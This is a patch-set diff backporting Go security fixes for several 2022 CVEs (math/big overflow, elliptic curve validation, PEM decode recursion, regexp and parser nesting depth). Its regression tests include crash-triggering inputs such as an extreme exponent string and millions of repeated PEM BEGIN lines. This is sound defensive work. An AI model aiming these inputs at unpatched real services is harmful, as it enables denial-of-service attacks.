192+ // change in the depth level, for instance "1+(..." produces a BinaryExpr
193+ // followed by a UnaryExpr, which increments the depth twice. The test
194+ // case comment explains which nodes are triggering the multiple depth
195+ // changes.
196+ parseMultiplier int
197+ // scope is true if we should also test the statement for the resolver scope
198+ // depth limit.
199+ scope bool
200+ // scopeMultiplier does the same as parseMultiplier, but for the scope
201+ // depths.
202+ scopeMultiplier int
203+}{
204+ // The format expands the part inside « » many times.
205+ // A second set of brackets nested inside the first stops the repetition,
206+ // so that for example «(«1»)» expands to (((...((((1))))...))).
207+ {name: "array", format: "package main; var x «[1]»int"},
208+ {name: "slice", format: "package main; var x «[]»int"},
209+ {name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
210+ {name: "pointer", format: "package main; var x «*»int"},
211+ {name: "func", format: "package main; var x «func()»int", scope: true},
212+ {name: "chan", format: "package main; var x «chan »int"},
213+ {name: "chan2", format: "package main; var x «<-chan »int"},
214+ {name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
215+ {name: "map", format: "package main; var x «map[int]»int"},
216+ {name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
217+ {name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
218+ {name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
219+ {name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2}, // Parser nodes: CompositeLit, KeyValueExpr
220+ {name: "dot", format: "package main; var x = «x.»x"},
221+ {name: "index", format: "package main; var x = x«[1]»"},
222+ {name: "slice", format: "package main; var x = x«[1:2]»"},
223+ {name: "slice3", format: "package main; var x = x«[1:2:3]»"},
224+ {name: "dottype", format: "package main; var x = x«.(any)»"},
225+ {name: "callseq", format: "package main; var x = x«()»"},
226+ {name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
227+ {name: "binary", format: "package main; var x = «1+»1"},
228+ {name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
229+ {name: "unary", format: "package main; var x = «^»1"},
230+ {name: "addr", format: "package main; var x = «& »x"},
231+ {name: "star", format: "package main; var x = «*»x"},
232+ {name: "recv", format: "package main; var x = «<-»x"},
233+ {name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2}, // Parser nodes: Ident, CallExpr
234+ {name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
235+ {name: "label", format: "package main; func main() { «Label:» }"},
236+ {name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
237+ {name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
238+ {name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
239+ {name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
240+ {name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
241+ {name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
242+ {name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
243+ {name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
244+ {name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
245+ {name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
246+ {name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: GoStmt, FuncLit
247+ {name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: DeferStmt, FuncLit
248+ {name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
249+}
250+
251+// split splits pre«mid»post into pre, mid, post.
252+// If the string does not have that form, split returns x, "", "".
253+func split(x string) (pre, mid, post string) {
254+ start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
255+ if start < 0 || end < 0 {
256+ return x, "", ""
257+ }
258+ return x[:start], x[start+len("«") : end], x[end+len("»"):]
259+}
260+
261+func TestParseDepthLimit(t *testing.T) {
262+ if runtime.GOARCH == "wasm" {
263+ t.Skip("causes call stack exhaustion on js/wasm")
264+ }
265+ for _, tt := range parseDepthTests {
266+ for _, size := range []string{"small", "big"} {
267+ t.Run(tt.name+"/"+size, func(t *testing.T) {
268+ n := maxNestLev + 1
269+ if tt.parseMultiplier > 0 {
270+ n /= tt.parseMultiplier
271+ }
272+ if size == "small" {
273+ // Decrease the number of statements by 10, in order to check
274+ // that we do not fail when under the limit. 10 is used to
275+ // provide some wiggle room for cases where the surrounding
276+ // scaffolding syntax adds some noise to the depth that changes
277+ // on a per testcase basis.
278+ n -= 10
279+ }
280+
281+ pre, mid, post := split(tt.format)
282+ if strings.Contains(mid, "«") {
283+ left, base, right := split(mid)
284+ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
285+ } else {
286+ mid = strings.Repeat(mid, n)
287+ }
288+ input := pre + mid + post
289+
290+ fset := token.NewFileSet()
291+ _, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
292+ if size == "small" {
293+ if err != nil {
294+ t.Errorf("ParseFile(...): %v (want success)", err)
295+ }
296+ } else {
297+ expected := "exceeded max nesting depth"
298+ if err == nil || !strings.HasSuffix(err.Error(), expected) {
299+ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
300+ }
301+ }
302+ })
303+ }
304+ }
305+}
306+
307+func TestScopeDepthLimit(t *testing.T) {
308+ if runtime.GOARCH == "wasm" {
309+ t.Skip("causes call stack exhaustion on js/wasm")
310+ }
311+ for _, tt := range parseDepthTests {
312+ if !tt.scope {
313+ continue
314+ }
315+ for _, size := range []string{"small", "big"} {
316+ t.Run(tt.name+"/"+size, func(t *testing.T) {
317+ n := maxScopeDepth + 1
318+ if tt.scopeMultiplier > 0 {
319+ n /= tt.scopeMultiplier
320+ }
321+ if size == "small" {
322+ // Decrease the number of statements by 10, in order to check
323+ // that we do not fail when under the limit. 10 is used to
324+ // provide some wiggle room for cases where the surrounding
325+ // scaffolding syntax adds some noise to the depth that changes
326+ // on a per testcase basis.
327+ n -= 10
328+ }
329+
330+ pre, mid, post := split(tt.format)
331+ if strings.Contains(mid, "«") {
332+ left, base, right := split(mid)
333+ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
334+ } else {
335+ mid = strings.Repeat(mid, n)
336+ }
337+ input := pre + mid + post
338+
339+ fset := token.NewFileSet()
340+ _, err := ParseFile(fset, "", input, DeclarationErrors)
341+ if size == "small" {
342+ if err != nil {
343+ t.Errorf("ParseFile(...): %v (want success)", err)
344+ }
345+ } else {
346+ expected := "exceeded max scope depth during object resolution"
347+ if err == nil || !strings.HasSuffix(err.Error(), expected) {
348+ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
349+ }
350+ }
351+ })
352+ }
353+ }
354+}
355--
3562.30.2
357
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
1From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
2From: Katie Hockman <katie@golang.org>
3Date: Sat, 26 Feb 2022 20:03:38 +0000
4Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
5 (*Rat).SetString
6
7Credit to rsc@ for the original patch.
8
9Thanks to the OSS-Fuzz project for discovering this
10issue and to Emmanuel Odeke (@odeke_et) for reporting it.
11
12Updates #50699
13Fixes #50700
14Fixes CVE-2022-23772
15---
16 src/math/big/ratconv.go | 5 +++++
17 src/math/big/ratconv_test.go | 1 +
18 2 files changed, 6 insertions(+)
19
20diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
21index 941139e..e8cbdbe 100644
22--- a/src/math/big/ratconv.go
23+++ b/src/math/big/ratconv.go
24@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
25 n := exp5
26 if n < 0 {
27 n = -n
28+ if n < 0 {
29+ // This can occur if -n overflows. -(-1 << 63) would become
30+ // -1 << 63, which is still negative.
31+ return nil, false
32+ }
33 }
34 pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
35 if exp5 > 0 {
36diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
37index ba0d1ba..b820df4 100644
38--- a/src/math/big/ratconv_test.go
39+++ b/src/math/big/ratconv_test.go
40@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
41 {in: "4/3/"},
42 {in: "4/3."},
43 {in: "4/"},
44+ {in: "13e-9223372036854775808"}, // CVE-2022-23772
45
46 // valid
47 {"0", "0", true},
48--
492.17.1
50
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
1From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Sat, 26 Feb 2022 10:40:57 +0000
4Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
5
6 field elements
7
8Updates #50974
9Fixes #50977
10Fixes CVE-2022-23806
11
12Signed-off-by: Minjae Kim <flowergom@gmail.com>
13
14---
15 src/crypto/elliptic/elliptic.go | 6 +++
16 src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
17 src/crypto/elliptic/p224.go | 6 +++
18 3 files changed, 93 insertions(+)
19
20diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
21index e2f71cd..bd574a4 100644
22--- a/src/crypto/elliptic/elliptic.go
23+++ b/src/crypto/elliptic/elliptic.go
24@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
25 }
26
27 func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
28+
29+ if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
30+ y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
31+ return false
32+ }
33+
34 // y² = x³ - 3x + b
35 y2 := new(big.Int).Mul(y, y)
36 y2.Mod(y2, curve.P)
37diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
38index 09c5483..b13a620 100644
39--- a/src/crypto/elliptic/elliptic_test.go
40+++ b/src/crypto/elliptic/elliptic_test.go
41@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
42 t.Errorf("Unmarshal accepts invalid Y coordinate")
43 }
44 }
45+
46+func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
47+ tests := []struct {
48+ name string
49+ curve Curve
50+ }{
51+ {"P256", P256()},
52+ {"P256/Params", P256().Params()},
53+ {"P224", P224()},
54+ {"P224/Params", P224().Params()},
55+ {"P384", P384()},
56+ {"P384/Params", P384().Params()},
57+ {"P521", P521()},
58+ {"P521/Params", P521().Params()},
59+ }
60+ if testing.Short() {
61+ tests = tests[:1]
62+ }
63+ for _, test := range tests {
64+ curve := test.curve
65+ t.Run(test.name, func(t *testing.T) {
66+ t.Parallel()
67+ f(t, curve)
68+ })
69+ }
70+}
71+
72+// TestInvalidCoordinates tests big.Int values that are not valid field elements
73+// (negative or bigger than P). They are expected to return false from
74+// IsOnCurve, all other behavior is undefined.
75+func TestInvalidCoordinates(t *testing.T) {
76+ testAllCurves(t, testInvalidCoordinates)
77+}
78+
79+func testInvalidCoordinates(t *testing.T, curve Curve) {
80+ checkIsOnCurveFalse := func(name string, x, y *big.Int) {
81+ if curve.IsOnCurve(x, y) {
82+ t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
83+ }
84+ }
85+
86+ p := curve.Params().P
87+ _, x, y, _ := GenerateKey(curve, rand.Reader)
88+ xx, yy := new(big.Int), new(big.Int)
89+
90+ // Check if the sign is getting dropped.
91+ xx.Neg(x)
92+ checkIsOnCurveFalse("-x, y", xx, y)
93+ yy.Neg(y)
94+ checkIsOnCurveFalse("x, -y", x, yy)
95+
96+ // Check if negative values are reduced modulo P.
97+ xx.Sub(x, p)
98+ checkIsOnCurveFalse("x-P, y", xx, y)
99+ yy.Sub(y, p)
100+ checkIsOnCurveFalse("x, y-P", x, yy)
101+
102+ // Check if positive values are reduced modulo P.
103+ xx.Add(x, p)
104+ checkIsOnCurveFalse("x+P, y", xx, y)
105+ yy.Add(y, p)
106+ checkIsOnCurveFalse("x, y+P", x, yy)
107+
108+ // Check if the overflow is dropped.
109+ xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
110+ checkIsOnCurveFalse("x+2⁵³⁵, y", xx, y)
111+ yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
112+ checkIsOnCurveFalse("x, y+2⁵³⁵", x, yy)
113+
114+ // Check if P is treated like zero (if possible).
115+ // y^2 = x^3 - 3x + B
116+ // y = mod_sqrt(x^3 - 3x + B)
117+ // y = mod_sqrt(B) if x = 0
118+ // If there is no modsqrt, there is no point with x = 0, can't test x = P.
119+ if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
120+ if !curve.IsOnCurve(big.NewInt(0), yy) {
121+ t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
122+ }
123+ checkIsOnCurveFalse("P, y", p, yy)
124+ }
125+}
126diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
127index 8c76021..f1bfd7e 100644
128--- a/src/crypto/elliptic/p224.go
129+++ b/src/crypto/elliptic/p224.go
130@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
131 }
132
133 func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
134+
135+ if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
136+ bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
137+ return false
138+ }
139+
140 var x, y p224FieldElement
141 p224FromBig(&x, bigX)
142 p224FromBig(&y, bigY)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
1From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 17 Jun 2022 12:22:53 +0530
4Subject: [PATCH] CVE-2022-24675
5
6Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
7CVE: CVE-2022-24675
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/encoding/pem/pem.go | 174 +++++++++++++++--------------------
11 src/encoding/pem/pem_test.go | 28 +++++-
12 2 files changed, 101 insertions(+), 101 deletions(-)
13
14diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
15index a7272da..1bee1c1 100644
16--- a/src/encoding/pem/pem.go
17+++ b/src/encoding/pem/pem.go
18@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
19 // pemStart begins with a newline. However, at the very beginning of
20 // the byte array, we'll accept the start string without it.
21 rest = data
22- if bytes.HasPrefix(data, pemStart[1:]) {
23- rest = rest[len(pemStart)-1 : len(data)]
24- } else if i := bytes.Index(data, pemStart); i >= 0 {
25- rest = rest[i+len(pemStart) : len(data)]
26- } else {
27- return nil, data
28- }
29-
30- typeLine, rest := getLine(rest)
31- if !bytes.HasSuffix(typeLine, pemEndOfLine) {
32- return decodeError(data, rest)
33- }
34- typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
35-
36- p = &Block{
37- Headers: make(map[string]string),
38- Type: string(typeLine),
39- }
40-
41 for {
42- // This loop terminates because getLine's second result is
43- // always smaller than its argument.
44- if len(rest) == 0 {
45+ if bytes.HasPrefix(rest, pemStart[1:]) {
46+ rest = rest[len(pemStart)-1:]
47+ } else if i := bytes.Index(rest, pemStart); i >= 0 {
48+ rest = rest[i+len(pemStart) : len(rest)]
49+ } else {
50 return nil, data
51 }
52- line, next := getLine(rest)
53
54- i := bytes.IndexByte(line, ':')
55- if i == -1 {
56- break
57+ var typeLine []byte
58+ typeLine, rest = getLine(rest)
59+ if !bytes.HasSuffix(typeLine, pemEndOfLine) {
60+ continue
61 }
62+ typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
63
64- // TODO(agl): need to cope with values that spread across lines.
65- key, val := line[:i], line[i+1:]
66- key = bytes.TrimSpace(key)
67- val = bytes.TrimSpace(val)
68- p.Headers[string(key)] = string(val)
69- rest = next
70- }
71+ p = &Block{
72+ Headers: make(map[string]string),
73+ Type: string(typeLine),
74+ }
75
76- var endIndex, endTrailerIndex int
77+ for {
78+ // This loop terminates because getLine's second result is
79+ // always smaller than its argument.
80+ if len(rest) == 0 {
81+ return nil, data
82+ }
83+ line, next := getLine(rest)
84
85- // If there were no headers, the END line might occur
86- // immediately, without a leading newline.
87- if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
88- endIndex = 0
89- endTrailerIndex = len(pemEnd) - 1
90- } else {
91- endIndex = bytes.Index(rest, pemEnd)
92- endTrailerIndex = endIndex + len(pemEnd)
93- }
94+ i := bytes.IndexByte(line, ':')
95+ if i == -1 {
96+ break
97+ }
98
99- if endIndex < 0 {
100- return decodeError(data, rest)
101- }
102+ // TODO(agl): need to cope with values that spread across lines.
103+ key, val := line[:i], line[i+1:]
104+ key = bytes.TrimSpace(key)
105+ val = bytes.TrimSpace(val)
106+ p.Headers[string(key)] = string(val)
107+ rest = next
108+ }
109
110- // After the "-----" of the ending line, there should be the same type
111- // and then a final five dashes.
112- endTrailer := rest[endTrailerIndex:]
113- endTrailerLen := len(typeLine) + len(pemEndOfLine)
114- if len(endTrailer) < endTrailerLen {
115- return decodeError(data, rest)
116- }
117+ var endIndex, endTrailerIndex int
118
119- restOfEndLine := endTrailer[endTrailerLen:]
120- endTrailer = endTrailer[:endTrailerLen]
121- if !bytes.HasPrefix(endTrailer, typeLine) ||
122- !bytes.HasSuffix(endTrailer, pemEndOfLine) {
123- return decodeError(data, rest)
124- }
125+ // If there were no headers, the END line might occur
126+ // immediately, without a leading newline.
127+ if len(p.Headers) == 0 && bytes.HasPrefix(rest, pemEnd[1:]) {
128+ endIndex = 0
129+ endTrailerIndex = len(pemEnd) - 1
130+ } else {
131+ endIndex = bytes.Index(rest, pemEnd)
132+ endTrailerIndex = endIndex + len(pemEnd)
133+ }
134
135- // The line must end with only whitespace.
136- if s, _ := getLine(restOfEndLine); len(s) != 0 {
137- return decodeError(data, rest)
138- }
139+ if endIndex < 0 {
140+ continue
141+ }
142
143- base64Data := removeSpacesAndTabs(rest[:endIndex])
144- p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
145- n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
146- if err != nil {
147- return decodeError(data, rest)
148- }
149- p.Bytes = p.Bytes[:n]
150+ // After the "-----" of the ending line, there should be the same type
151+ // and then a final five dashes.
152+ endTrailer := rest[endTrailerIndex:]
153+ endTrailerLen := len(typeLine) + len(pemEndOfLine)
154+ if len(endTrailer) < endTrailerLen {
155+ continue
156+ }
157+
158+ restOfEndLine := endTrailer[endTrailerLen:]
159+ endTrailer = endTrailer[:endTrailerLen]
160+ if !bytes.HasPrefix(endTrailer, typeLine) ||
161+ !bytes.HasSuffix(endTrailer, pemEndOfLine) {
162+ continue
163+ }
164
165- // the -1 is because we might have only matched pemEnd without the
166- // leading newline if the PEM block was empty.
167- _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
168+ // The line must end with only whitespace.
169+ if s, _ := getLine(restOfEndLine); len(s) != 0 {
170+ continue
171+ }
172
173- return
174-}
175+ base64Data := removeSpacesAndTabs(rest[:endIndex])
176+ p.Bytes = make([]byte, base64.StdEncoding.DecodedLen(len(base64Data)))
177+ n, err := base64.StdEncoding.Decode(p.Bytes, base64Data)
178+ if err != nil {
179+ continue
180+ }
181+ p.Bytes = p.Bytes[:n]
182
183-func decodeError(data, rest []byte) (*Block, []byte) {
184- // If we get here then we have rejected a likely looking, but
185- // ultimately invalid PEM block. We need to start over from a new
186- // position. We have consumed the preamble line and will have consumed
187- // any lines which could be header lines. However, a valid preamble
188- // line is not a valid header line, therefore we cannot have consumed
189- // the preamble line for the any subsequent block. Thus, we will always
190- // find any valid block, no matter what bytes precede it.
191- //
192- // For example, if the input is
193- //
194- // -----BEGIN MALFORMED BLOCK-----
195- // junk that may look like header lines
196- // or data lines, but no END line
197- //
198- // -----BEGIN ACTUAL BLOCK-----
199- // realdata
200- // -----END ACTUAL BLOCK-----
201- //
202- // we've failed to parse using the first BEGIN line
203- // and now will try again, using the second BEGIN line.
204- p, rest := Decode(rest)
205- if p == nil {
206- rest = data
207+ // the -1 is because we might have only matched pemEnd without the
208+ // leading newline if the PEM block was empty.
209+ _, rest = getLine(rest[endIndex+len(pemEnd)-1:])
210+ return p, rest
211 }
212- return p, rest
213 }
214
215 const pemLineLength = 64
216diff --git a/src/encoding/pem/pem_test.go b/src/encoding/pem/pem_test.go
217index 8515b46..4485581 100644
218--- a/src/encoding/pem/pem_test.go
219+++ b/src/encoding/pem/pem_test.go
220@@ -107,6 +107,12 @@ const pemMissingEndingSpace = `
221 dGVzdA==
222 -----ENDBAR-----`
223
224+const pemMissingEndLine = `
225+-----BEGIN FOO-----
226+Header: 1`
227+
228+var pemRepeatingBegin = strings.Repeat("-----BEGIN \n", 10)
229+
230 var badPEMTests = []struct {
231 name string
232 input string
233@@ -131,14 +137,34 @@ var badPEMTests = []struct {
234 "missing ending space",
235 pemMissingEndingSpace,
236 },
237+ {
238+ "repeating begin",
239+ pemRepeatingBegin,
240+ },
241+ {
242+ "missing end line",
243+ pemMissingEndLine,
244+ },
245 }
246
247 func TestBadDecode(t *testing.T) {
248 for _, test := range badPEMTests {
249- result, _ := Decode([]byte(test.input))
250+ result, rest := Decode([]byte(test.input))
251 if result != nil {
252 t.Errorf("unexpected success while parsing %q", test.name)
253 }
254+ if string(rest) != test.input {
255+ t.Errorf("unexpected rest: %q; want = %q", rest, test.input)
256+ }
257+ }
258+}
259+
260+func TestCVE202224675(t *testing.T) {
261+ // Prior to CVE-2022-24675, this input would cause a stack overflow.
262+ input := []byte(strings.Repeat("-----BEGIN \n", 10000000))
263+ result, rest := Decode(input)
264+ if result != nil || !reflect.DeepEqual(rest, input) {
265+ t.Errorf("Encode of %#v decoded as %#v", input, rest)
266 }
267 }
268
269--
2702.25.1
271
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
new file mode 100644
index 0000000000..e4270d8a75
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24921.patch
@@ -0,0 +1,198 @@
1From ba99f699d26483ea1045f47c760e9be30799e311 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Wed, 2 Feb 2022 16:41:32 -0500
4Subject: [PATCH] regexp/syntax: reject very deeply nested regexps in Parse
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Upstream-Status: Backport [https://github.com/golang/go/commit/2b65cde5868d8245ef8a0b8eba1e361440252d3b]
10CVE: CVE-2022-24921
11Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org
12
13
14The regexp code assumes it can recurse over the structure of
15a regexp safely. Go's growable stacks make that reasonable
16for all plausible regexps, but implausible ones can reach the
17“infinite recursion?” stack limit.
18
19This CL limits the depth of any parsed regexp to 1000.
20That is, the depth of the parse tree is required to be ≤ 1000.
21Regexps that require deeper parse trees will return ErrInternalError.
22A future CL will change the error to ErrInvalidDepth,
23but using ErrInternalError for now avoids introducing new API
24in point releases when this is backported.
25
26Fixes #51112.
27Fixes #51117.
28
29Change-Id: I97d2cd82195946eb43a4ea8561f5b95f91fb14c5
30Reviewed-on: https://go-review.googlesource.com/c/go/+/384616
31Trust: Russ Cox <rsc@golang.org>
32Run-TryBot: Russ Cox <rsc@golang.org>
33Reviewed-by: Ian Lance Taylor <iant@golang.org>
34Reviewed-on: https://go-review.googlesource.com/c/go/+/384855
35---
36 src/regexp/syntax/parse.go | 72 ++++++++++++++++++++++++++++++++-
37 src/regexp/syntax/parse_test.go | 7 ++++
38 2 files changed, 77 insertions(+), 2 deletions(-)
39
40diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
41index 8c6d43a..55bd20d 100644
42--- a/src/regexp/syntax/parse.go
43+++ b/src/regexp/syntax/parse.go
44@@ -76,13 +76,29 @@ const (
45 opVerticalBar
46 )
47
48+// maxHeight is the maximum height of a regexp parse tree.
49+// It is somewhat arbitrarily chosen, but the idea is to be large enough
50+// that no one will actually hit in real use but at the same time small enough
51+// that recursion on the Regexp tree will not hit the 1GB Go stack limit.
52+// The maximum amount of stack for a single recursive frame is probably
53+// closer to 1kB, so this could potentially be raised, but it seems unlikely
54+// that people have regexps nested even this deeply.
55+// We ran a test on Google's C++ code base and turned up only
56+// a single use case with depth > 100; it had depth 128.
57+// Using depth 1000 should be plenty of margin.
58+// As an optimization, we don't even bother calculating heights
59+// until we've allocated at least maxHeight Regexp structures.
60+const maxHeight = 1000
61+
62 type parser struct {
63 flags Flags // parse mode flags
64 stack []*Regexp // stack of parsed expressions
65 free *Regexp
66 numCap int // number of capturing groups seen
67 wholeRegexp string
68- tmpClass []rune // temporary char class work space
69+ tmpClass []rune // temporary char class work space
70+ numRegexp int // number of regexps allocated
71+ height map[*Regexp]int // regexp height for height limit check
72 }
73
74 func (p *parser) newRegexp(op Op) *Regexp {
75@@ -92,16 +108,52 @@ func (p *parser) newRegexp(op Op) *Regexp {
76 *re = Regexp{}
77 } else {
78 re = new(Regexp)
79+ p.numRegexp++
80 }
81 re.Op = op
82 return re
83 }
84
85 func (p *parser) reuse(re *Regexp) {
86+ if p.height != nil {
87+ delete(p.height, re)
88+ }
89 re.Sub0[0] = p.free
90 p.free = re
91 }
92
93+func (p *parser) checkHeight(re *Regexp) {
94+ if p.numRegexp < maxHeight {
95+ return
96+ }
97+ if p.height == nil {
98+ p.height = make(map[*Regexp]int)
99+ for _, re := range p.stack {
100+ p.checkHeight(re)
101+ }
102+ }
103+ if p.calcHeight(re, true) > maxHeight {
104+ panic(ErrInternalError)
105+ }
106+}
107+
108+func (p *parser) calcHeight(re *Regexp, force bool) int {
109+ if !force {
110+ if h, ok := p.height[re]; ok {
111+ return h
112+ }
113+ }
114+ h := 1
115+ for _, sub := range re.Sub {
116+ hsub := p.calcHeight(sub, false)
117+ if h < 1+hsub {
118+ h = 1 + hsub
119+ }
120+ }
121+ p.height[re] = h
122+ return h
123+}
124+
125 // Parse stack manipulation.
126
127 // push pushes the regexp re onto the parse stack and returns the regexp.
128@@ -137,6 +189,7 @@ func (p *parser) push(re *Regexp) *Regexp {
129 }
130
131 p.stack = append(p.stack, re)
132+ p.checkHeight(re)
133 return re
134 }
135
136@@ -252,6 +305,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
137 re.Sub = re.Sub0[:1]
138 re.Sub[0] = sub
139 p.stack[n-1] = re
140+ p.checkHeight(re)
141
142 if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
143 return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
144@@ -699,6 +753,21 @@ func literalRegexp(s string, flags Flags) *Regexp {
145 // Flags, and returns a regular expression parse tree. The syntax is
146 // described in the top-level comment.
147 func Parse(s string, flags Flags) (*Regexp, error) {
148+ return parse(s, flags)
149+}
150+
151+func parse(s string, flags Flags) (_ *Regexp, err error) {
152+ defer func() {
153+ switch r := recover(); r {
154+ default:
155+ panic(r)
156+ case nil:
157+ // ok
158+ case ErrInternalError:
159+ err = &Error{Code: ErrInternalError, Expr: s}
160+ }
161+ }()
162+
163 if flags&Literal != 0 {
164 // Trivial parser for literal string.
165 if err := checkUTF8(s); err != nil {
166@@ -710,7 +779,6 @@ func Parse(s string, flags Flags) (*Regexp, error) {
167 // Otherwise, must do real work.
168 var (
169 p parser
170- err error
171 c rune
172 op Op
173 lastRepeat string
174diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
175index 5581ba1..1ef6d8a 100644
176--- a/src/regexp/syntax/parse_test.go
177+++ b/src/regexp/syntax/parse_test.go
